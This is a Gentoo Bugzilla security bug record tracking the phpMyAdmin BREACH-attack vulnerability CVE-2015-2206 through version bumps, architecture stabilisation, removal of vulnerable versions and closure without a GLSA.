Summary: | <dev-db/phpmyadmin-{4.0.10.9,4.2.13.2,4.3.12}: Risk of BREACH attack due to reflected parameter (PMASA-2015-1) (CVE-2015-2206) | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Agostino Sarubbo <ago> |
Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | minor | CC: | jmbsvicetto, web-apps |
Priority: | Normal | ||
Version: | unspecified | ||
Hardware: | All | ||
OS: | Linux | ||
URL: | https://bugzilla.redhat.com/show_bug.cgi?id=1198794 | ||
Whiteboard: | B3 [noglsa] | ||
Package list: | Runtime testing required: | --- |
Description
Agostino Sarubbo
2015-03-05 07:53:21 UTC
15:33 < gentoovcs> jmbsvicetto → gentoo-x86 (dev-db/phpmyadmin/) Bump phpmyadmin to the latest releases and add 4.4.0_beta1. Address CVE-2014-{9218,9219} - fixes bug 531684. Address PMASA-2015-1 - fixes bug 542218. Drop old vulnerable versions. Arch teams, please mark stable the following versions: =dev-db/phpmyadmin-4.0.10.9 =dev-db/phpmyadmin-4.2.13.2 =dev-db/phpmyadmin-4.3.12 Target KEYWORDS="alpha amd64 hppa ppc ppc64 sparc x86". Stable for HPPA. x86 done. amd64 stable ppc stable ppc64 stable sparc stable alpha stable. Maintainer(s), please cleanup. Security, please vote. Arches, Thank you for your work. GLSA Vote: No Maintainer(s), please drop the vulnerable version(s). CVE-2015-2206 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2206): libraries/select_lang.lib.php in phpMyAdmin 4.0.x before 4.0.10.9, 4.2.x before 4.2.13.2, and 4.3.x before 4.3.11.1 includes invalid language values in unknown-language error responses that contain a CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests. (In reply to Yury German from comment #9) > > Maintainer(s), please drop the vulnerable version(s). 02:17 < gentoovcs> jmbsvicetto → gentoo-x86 (dev-db/phpmyadmin/) Drop vulnerable version - bug 542218. 02:17 < willikins> gentoovcs: https://bugs.gentoo.org/542218 "<dev-db/phpmyadmin-{4.0.10.9,4.2.13.2,4.3.12}: Risk of BREACH attack due to reflected parameter (PMASA-2015-1) (CVE-2015-2206)"; Gentoo Security, Vulnerabilities; IN_P; ago:security done Maintainer(s), Thank you for you for cleanup. GLSA vote: no. Closing as [noglsa] |